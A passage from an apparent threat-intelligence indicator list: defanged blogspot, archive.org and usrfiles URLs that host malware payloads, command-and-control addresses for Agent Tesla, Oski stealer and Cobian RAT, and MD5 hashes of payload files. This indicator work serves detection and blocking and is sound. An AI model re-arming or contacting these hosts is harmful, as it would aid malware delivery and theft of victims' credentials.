	hxxp://kix2k[.]blogspot[.]com/p/9[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/1[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/10[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/11[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/12[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/13[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/14[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/15[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/16[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/17[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/18[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/19[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/2[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/20[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/21[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/21[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/22[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/23[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/24[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/25[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/26[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/27[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/28[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/29[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/3[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/30[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/31[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/32[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/33[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/34[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/35[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/36[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/37[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/38[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/39[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/4[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/40[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/41[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/44[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/5[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/52[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/6[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/7[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/8[.]html
	hxxp://papagujjiiiiii[.]blogspot[.]com/p/9[.]html

Archive Pages
	hxxps://ia601401[.]us[.]archive[.]org/10/items/3_20210601_202106/1[.]txt
	hxxps://ia601401[.]us[.]archive[.]org/10/items/3_20210601_202106/2[.]txt
	hxxps://ia601401[.]us[.]archive[.]org/10/items/3_20210601_202106/3[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/13-1[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/13-2[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/13-3[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/15-1[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/15-2[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/15-3[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/17-1[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/17-2[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/17-3[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/18-1[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/18-2[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/18-3[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/20-1[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/20-2[.]txt
	hxxps://ia601409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/20-3[.]txt
	hxxps://ia601503[.]us[.]archive[.]org/32/items/87-Redone-June-9/3-1[.]txt
	hxxps://ia601503[.]us[.]archive[.]org/32/items/87-Redone-June-9/3-2[.]txt
	hxxps://ia601503[.]us[.]archive[.]org/32/items/87-Redone-June-9/3-3[.]txt
	hxxps://ia601507[.]us[.]archive[.]org/20/items/3_20210601_20210601/1[.]txt
	hxxps://ia601507[.]us[.]archive[.]org/20/items/3_20210601_20210601/2[.]txt
	hxxps://ia601507[.]us[.]archive[.]org/20/items/3_20210601_20210601/3[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/1-1[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/1-2[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/1-3[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/11-1[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/11-2[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/12-3[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/2-1[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/2-2[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/2-3[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/5-1[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/5-2[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/5-3[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/7-1[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/7-2[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/7-3[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/9-1[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/9-2[.]txt
	hxxps://ia801409[.]us[.]archive[.]org/26/items/120-Crypted-03-June/9-3[.]txt
	hxxps://ia801500[.]us[.]archive[.]org/0/items/1_20210527_20210527/1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/10-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/10-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/10-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/12-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/12-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/12-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/14-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/14-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/14-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/16-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/16-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/16-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/19-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/19-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/19-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/21-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/21-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/21-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/22-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/22-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/22-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/23-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/23-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/23-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/24-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/24-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/24-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/25-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/25-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/25-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/26-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/26-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/26-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/27-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/27-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/27-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/28-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/28-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/28-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/29-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/29-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/29-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/30-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/30-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/30-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/31-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/31-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/32-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/32-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/32-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/33-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/33-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/33-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/34-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/34-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/34-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/35-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/35-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/35-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/36-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/36-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/36-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/37-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/37-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/37-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/38-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/38-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/38-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/39-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/39-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/39-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/4-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/4-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/4-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/40-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/40-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/40-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/6-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/6-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/6-3[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/8-1[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/8-2[.]txt
	hxxps://ia801503[.]us[.]archive[.]org/32/items/87-Redone-June-9/8-3[.]txt
	
	
Usrfiles
	hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f[.]usrfiles[.]com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d[.]txt
	hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f[.]usrfiles[.]com/ugd/73cceb_c28bcff4b4ac4d648a44cba2612ce3a6[.]txt
	hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f[.]usrfiles[.]com/ugd/73cceb_d6327f9589c84101ad8724c9d6eaea23[.]txt
	hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f[.]usrfiles[.]com/ugd/73cceb_8c96b0913b2d43038ded2f06e3ee527b[.]txt
	
C2s:

	Agent Tesla
		fxp://103[.]151[.]125[.]220
		hxxp://103[.]114[.]107[.]28/me/web10/inc/d3808c7188cb55[.]php
		hxxp://103[.]114[.]107[.]28/master/black/inc/a73043f92e1eba[.]php

		
	Oski stealer
		103[.]114[.]107[.]28/l1010/
		103[.]114[.]107[.]28/l1212/
		103[.]114[.]107[.]28/l1414/
		103[.]114[.]107[.]28/l1616/
		103[.]114[.]107[.]28/l1919/
		103[.]114[.]107[.]28/l2121/
		103[.]114[.]107[.]28/l22/
		103[.]114[.]107[.]28/l2323/
		103[.]114[.]107[.]28/l24/
		103[.]114[.]107[.]28/l25/
		103[.]114[.]107[.]28/l2626/
		103[.]114[.]107[.]28/l27/
		103[.]114[.]107[.]28/l2828/
		103[.]114[.]107[.]28/l29/
		103[.]114[.]107[.]28/l3/
		103[.]114[.]107[.]28/l3030/
		103[.]114[.]107[.]28/l3131/
		103[.]114[.]107[.]28/l32/
		103[.]114[.]107[.]28/l33/
		103[.]114[.]107[.]28/l34/
		103[.]114[.]107[.]28/l35/
		103[.]114[.]107[.]28/l36/
		103[.]114[.]107[.]28/l37/
		103[.]114[.]107[.]28/l38/
		103[.]114[.]107[.]28/l39/
		103[.]114[.]107[.]28/l404/
		103[.]114[.]107[.]28/l4040/
		103[.]114[.]107[.]28/l606/
		103[.]114[.]107[.]28/l808/
		
	Cobian RAT:
		193[.]56[.]29[.]171:666
	
Hashes:


	Maldoc:
		df91f20f8204e6d0e1239202c58d438143ccc560ac5ae8b2d8cf8e49aaae370

	Payloads

		8ac9e272b1df5061daa9455ff0230c36  1_20210527_20210527/1.txt
		78ecd4b0a94ebd28af2e67e02e02ce1e  120-Crypted-03-June/10-1.txt
		b3a18b4fa0d0ea832e9807e265669977  120-Crypted-03-June/10-2.txt
		2053423b9f42e0a05d2637afd4708098  120-Crypted-03-June/10-3.txt
		8ad68f5c7dd4d299af03f3a53d3eea8f  120-Crypted-03-June/11-1.txt
		b3a18b4fa0d0ea832e9807e265669977  120-Crypted-03-June/11-2.txt
		9c226145547ce4265b7cdaf7c5e0cb39  120-Crypted-03-June/11-3.txt
		8feadf3a0c1ceb6b2207a4be0746dc74  120-Crypted-03-June/1-1.txt
		0533575076d7185ba435f3d260e8b3e4  120-Crypted-03-June/12-1.txt
		8468472ca107f2a4e267438baeaf38b4  120-Crypted-03-June/12-2.txt
		05eaa46461a00795419425d575ccee0a  120-Crypted-03-June/12-3.txt
		0dcd00510d7cdf90218c8acb28802f46  120-Crypted-03-June/1-2.txt
		fc2f33217e1a3595b6e287abf6f14262  120-Crypted-03-June/13-1.txt
		d2b540b79ab88215e0feea2f14d8fdad  120-Crypted-03-June/13-2.txt
		8f84a3ca662fe5a89a35c32df3db77d4  120-Crypted-03-June/13-3.txt
		9722cdf9c49d3fc94ffa7dd0a2710aa5  120-Crypted-03-June/1-3.txt
		4ce14f41f8f79978be7cccbd3cf7fce3  120-Crypted-03-June/14-1.txt
		e3f7a436ab2d32d2567204e45bdc2b5a  120-Crypted-03-June/14-2.txt
		8a67433f0f884eaeafe9a20e73e31e68  120-Crypted-03-June/14-3.txt
		ef497db08eb237cbba60985baf68db24  120-Crypted-03-June/15-1.txt
		530792b4cfa0029b904ae5130fe1d265  120-Crypted-03-June/15-2.txt
		de3817047cd8f9bd0e975901574bf1ce  120-Crypted-03-June/15-3.txt
		666ed175d4a2f463c4df96f78e48adf7  120-Crypted-03-June/16-1.txt
		3c2582267b0fcfb137f40d2694937d5a  120-Crypted-03-June/16-2.txt
		5846789565ba970c2805bbf5fb1a5b5b  120-Crypted-03-June/16-3.txt
		8c25a3a8169f7372c33ccb7233d269a5  120-Crypted-03-June/17-1.txt
		daf543db36758a68acc7aa0dfe15bed3  120-Crypted-03-June/17-2.txt
		56d68b21e189451019367c59f00ee597  120-Crypted-03-June/17-3.txt
		edb14699d2e6bd02ef56e3fbd740f278  120-Crypted-03-June/18-1.txt
		08ee3567b7cb389951dd0c9c5f7b8272  120-Crypted-03-June/18-2.txt
		4b292b78180725968c759263bf2bf325  120-Crypted-03-June/18-3.txt
		784d471aa108a379fc6d4ecaaf9449e1  120-Crypted-03-June/19-1.txt
		63fccd4437a1fc5ec961bd80801aa027  120-Crypted-03-June/19-2.txt
		537dafbf2acf47786823913fcb138634  120-Crypted-03-June/19-3.txt
		936e261d17eb17f3d72d1b95460f6956  120-Crypted-03-June/20-1.txt
		9c3179a6730b4c6c3a31d82f3aa2f8c3  120-Crypted-03-June/20-2.txt
		f91a93aba78c83e1e03a3ce5e2dc72c6  120-Crypted-03-June/20-3.txt
		26f79d975f75e6bc2eac26ac849aad25  120-Crypted-03-June/21-1.txt
		3f612a7d13131add2c7480a8f4afc2e2  120-Crypted-03-June/21-2.txt
		e2e0a441291c5f7201101cf266aa2fc0  120-Crypted-03-June/21-3.txt
		678fe2eeaa5398e8366ede0ba83216f7  120-Crypted-03-June/2-1.txt
		7aa1d4597d658099f9c75c5ee7208f78  120-Crypted-03-June/22-1.txt
		dac9484cbfa5767670567eec53d8979b  120-Crypted-03-June/22-2.txt
		94e73932bf2784e31572c764f982d4d0  120-Crypted-03-June/22-3.txt
		0793fe0c7557d1719be3c1aab37d15d3  120-Crypted-03-June/2-2.txt
		2768710190533867f46996fddc060622  120-Crypted-03-June/23-1.txt
		e5351dc8fbec2f874e623c30e719c48b  120-Crypted-03-June/23-2.txt
		92444933697fb73b97c1cc1029fd5d90  120-Crypted-03-June/23-3.txt
		f4d5309a1936b515ceb70ee239746889  120-Crypted-03-June/2-3.txt
		763c0146ec40b73ff04933a46b39fd50  120-Crypted-03-June/24-1.txt
		80cafac3823c9260b7d72c2e69f2edf5  120-Crypted-03-June/24-2.txt
		9b34346208a422b5f7ddc652713bd405  120-Crypted-03-June/24-3.txt
		9b2f171a482bb7a217bc5831a7dcbf1c  120-Crypted-03-June/25-1.txt
		3d793ab63dcd431fa16d38ec5ab1f9c7  120-Crypted-03-June/25-2.txt
		6da1d6a255fe2098408c3c889a4e157e  120-Crypted-03-June/25-3.txt
		8fbc06233e924ef500dc33786d706817  120-Crypted-03-June/26-1.txt
		54d62e92b93a40149d7e4fa19b798201  120-Crypted-03-June/26-2.txt
		653a032aee2b9a31a8610954e5c28402  120-Crypted-03-June/26-3.txt
		3d69a438d2ad0aad062f2e9506f35dfe  120-Crypted-03-June/27-1.txt
		cf8783d1c9bd6b15618c6de26308703b  120-Crypted-03-June/27-2.txt
		b33604969a34f8a6d4678e154e049fd3  120-Crypted-03-June/27-3.txt
		6cb56ad248abbad6b57ae9b444e05680  120-Crypted-03-June/28-1.txt
		0446466ac12756312798acc282f43f42  120-Crypted-03-June/28-2.txt
		9db2fe51c5402a405f23f0255f4b76a7  120-Crypted-03-June/28-3.txt
		05df1a35f25ff857db2e24c1dcb65777  120-Crypted-03-June/29-1.txt
		d9fa5b18b345033d9b02b1de41ab03c9  120-Crypted-03-June/29-2.txt
		cfa266344b12ad260d806d51e1382f58  120-Crypted-03-June/29-3.txt
		f732f398ed8470ab3d7026e8efcea306  120-Crypted-03-June/30-1.txt
		9840fbbae1cbd55f9fef722508b0b03f  120-Crypted-03-June/30-2.txt
		387ca63a073cf45af288f89a3da3da8c  120-Crypted-03-June/30-3.txt
		a939544768ca68a7346baa3619bcd80a  120-Crypted-03-June/31-1.txt
		219233774e3dcd6769eb7867ad3ba169  120-Crypted-03-June/31-2.txt
		7aace4d8b64e1a56ca65ddb2536ead9a  120-Crypted-03-June/31-3.txt
		9019caf9c14645b88f4c246b16bda29a  120-Crypted-03-June/3-1.txt
		56711d95738034380f8e51d2da4fee41  120-Crypted-03-June/32-1.txt
		134a8e6481ac306a18cf1b20baaf8289  120-Crypted-03-June/32-2.txt
		e3b2de137b33c9a7b451ac31a2d8ca52  120-Crypted-03-June/32-3.txt
		67b72b574b52873730e274250feef9ed  120-Crypted-03-June/3-2.txt
		6d23761fa990f64ebbb3a9fb0b617e9c  120-Crypted-03-June/33-1.txt
		691bcebe74dfe8204bb6eb1ca4f37f6b  120-Crypted-03-June/33-2.txt
		af482d4723fb4f96ff0e28a64b85baf5  120-Crypted-03-June/33-3.txt
		d8b3a58ceb8f9960bb836f3fb44f561a  120-Crypted-03-June/3-3.txt
		fdd9a6618c208226657cb8461e7dab96  120-Crypted-03-June/34-1.txt
		dc7cce7fed750c48705f46022f2f9079  120-Crypted-03-June/34-2.txt
		db095eefe585682c0a88c000369b7b08  120-Crypted-03-June/34-3.txt
		034e0a3d97747d22038e1863c0f2d4b8  120-Crypted-03-June/35-1.txt
		dabd06a518470e0258264304bd457d83  120-Crypted-03-June/35-2.txt
		fdd0c312c24556d07fad6882b4fed38e  120-Crypted-03-June/35-3.txt
		21a256e5887cb8472f38a391fa9f3f07  120-Crypted-03-June/36-1.txt
		c3e00cc05db28caecab4318f65f9a7c2  120-Crypted-03-June/36-2.txt
		636e799e0d2695f6d1b4fc1c32f18b77  120-Crypted-03-June/36-3.txt
		9e9a9ad05128c2ef2c320442561666b8  120-Crypted-03-June/37-1.txt
		177f321e3e3780aeff7954abf45caf77  120-Crypted-03-June/37-2.txt
		40b725beab269432755b7015c056a354  120-Crypted-03-June/37-3.txt
		4e1f1d9bf4b4f09c83818b2947972800  120-Crypted-03-June/38-1.txt
		f1a8247a688ebcb34d728f27ff8489dd  120-Crypted-03-June/38-2.txt
		91bf601ab3b4c07416e308248528e8f1  120-Crypted-03-June/38-3.txt
		c84af18c253798e3c6321c2a7048e385  120-Crypted-03-June/39-1.txt
		a0d1d10ce1be5360824104bafd7eb255  120-Crypted-03-June/39-2.txt
		ceb8f7cc58ac10681b1757fe6f738560  120-Crypted-03-June/39-3.txt
		c707720b420b128bb25bedfe7b474e1e  120-Crypted-03-June/40-1.txt
		330ef71ad71267a0eb80fcc149121052  120-Crypted-03-June/40-2.txt
		2527db2a682db3ff527685efe6f22592  120-Crypted-03-June/40-3.txt
		795d5fc2b369d961f297373d73684fdd  120-Crypted-03-June/4-1.txt
		ca3bb3fc686f6bb324c449a91bb495fb  120-Crypted-03-June/4-2.txt
		7ad581d76c337e128d9cfd945e93b4f7  120-Crypted-03-June/4-3.txt
		23f2e867ddbbe2e6c9e7959bae0df84e  120-Crypted-03-June/5-1.txt
		1789c812d8efebd2b67d2ada473a2219  120-Crypted-03-June/5-2.txt
		e2bbf77bd9861f8f202a44421e66b598  120-Crypted-03-June/5-3.txt
		77e2b04565e2fa5129b062b860253c8d  120-Crypted-03-June/6-1.txt
		25190ed01b56665dc1ef07932f781619  120-Crypted-03-June/6-2.txt
		f09d4299af9c6a1e1d88e91360c9f58f  120-Crypted-03-June/6-3.txt
		0d09fe43e5f18cd6c7a38cda8fd9f2e6  120-Crypted-03-June/7-1.txt
		5f34c76b6ffb8fd032ccc5633072f573  120-Crypted-03-June/7-2.txt
		32a1564f7474be62da3d73e7c4ea4fb5  120-Crypted-03-June/7-3.txt
		db8f53266b12e2beaf2f034b73824cbf  120-Crypted-03-June/8-1.txt
		5e955058a451a655fe87853ab9195363  120-Crypted-03-June/8-2.txt
		731fb33c344d0a0d98302ee1f9183851  120-Crypted-03-June/8-3.txt
		5e70c004a15f9c9dd298b95046feee7f  120-Crypted-03-June/9-1.txt
		74b35e21aacaf09b6fe05882bd300f8c  120-Crypted-03-June/9-2.txt
		c2d2ff688f1345c9c2eb58e8b1d5a5d2  120-Crypted-03-June/9-3.txt
		ec3e77543162b8cf482a12932e379c6d  25-r_20210424/10R.txt
		5422ba7da2e39fe523d9b761fb984606  25-r_20210424/11R.txt
		c30c4084d1fe34d9e36ccc95f079ec34  25-r_20210424/12R.txt
		bd810d8044d5df329e28f0a54556b013  25-r_20210424/13R.txt
		c19aecfdfa3454821804ca17e89f5a7c  25-r_20210424/14R.txt
		10af9741ca380587a617ce38d837fe01  25-r_20210424/15R.txt
		fc08d229b9c8aae66c9a8a7ae84e135b  25-r_20210424/16r.txt
		58f834d3b85587eab78290ac6ee3a78c  25-r_20210424/17r.txt
		0491fee700acffd13a1d241fe82656c5  25-r_20210424/18r.txt
		de99298cb5c5bd8057866b5e7ad22a8b  25-r_20210424/19r.txt
		a369c749252c066c900e15fb93d08671  25-r_20210424/1reverse.txt
		5886c65747b62c9069de28c6a5c029ae  25-r_20210424/20r.txt
		9c1f7e33fb8e88fd953b6dddc1541eaf  25-r_20210424/21r.txt
		24a7beffd483818f3659dbb8e0cb6a80  25-r_20210424/22r.txt
		73628e2b6356ad8b6f116adde8d11e15  25-r_20210424/23r.txt
		7c697bd68f66b8a884a9a0b933f0a8a4  25-r_20210424/24r.txt
		960ad3d3b8589650c8d0a7f6ca7fa234  25-r_20210424/25r.txt
		8df5072e6d04957a0185d026c5033c61  25-r_20210424/26r.txt
		1d5350413604d8936185e33c8d9ed4fc  25-r_20210424/27r.txt
		c6089e76775895ace9c5fae1dd88d0af  25-r_20210424/28r.txt
		e231d0f8168e7a8fdf9d401b79f047a2  25-r_20210424/29r.txt
		6e5d6023c69ede72d0caeb1590602902  25-r_20210424/2R.txt
		9d6644ab88ad61a233db03dd9b01c08f  25-r_20210424/30r.txt
		0f661c65a931e41df1416289043190a3  25-r_20210424/31r.txt
		7dc1539921c6da53d6a05cbd6b24d326  25-r_20210424/32r.txt
		08227aac3bfb3016b1cb2a1fe2683bc0  25-r_20210424/33r.txt
		d36794f5ae60ca8ccd4f9070da0da643  25-r_20210424/34r.txt
		5330ccda2de25ccc479da78e955a81e2  25-r_20210424/35r.txt
		59540f3e157940dd03924aeacb9c8b99  25-r_20210424/36r.txt
		637647ec58a7af5e88fca43b64a870de  25-r_20210424/37r.txt
		f9b26a574dcdd7e049280c16c5f329ed  25-r_20210424/38r.txt
		8b3dbf766a974195ac474333f914651f  25-r_20210424/39r.txt
		1d52d8b296e7fbb20c0408278899be11  25-r_20210424/3R.txt
		a3b1d91b1c678f47e21d2f0d1ef5c0db  25-r_20210424/40r.txt
		e2b7d1d7d530d7416a092a607cd178ed  25-r_20210424/4R.txt
		5f5dbf7e46451ecd73b1bb9042f56506  25-r_20210424/5R.txt
		ea4842f2ecf1dafddb2a3ed6ef4d1274  25-r_20210424/6R.txt
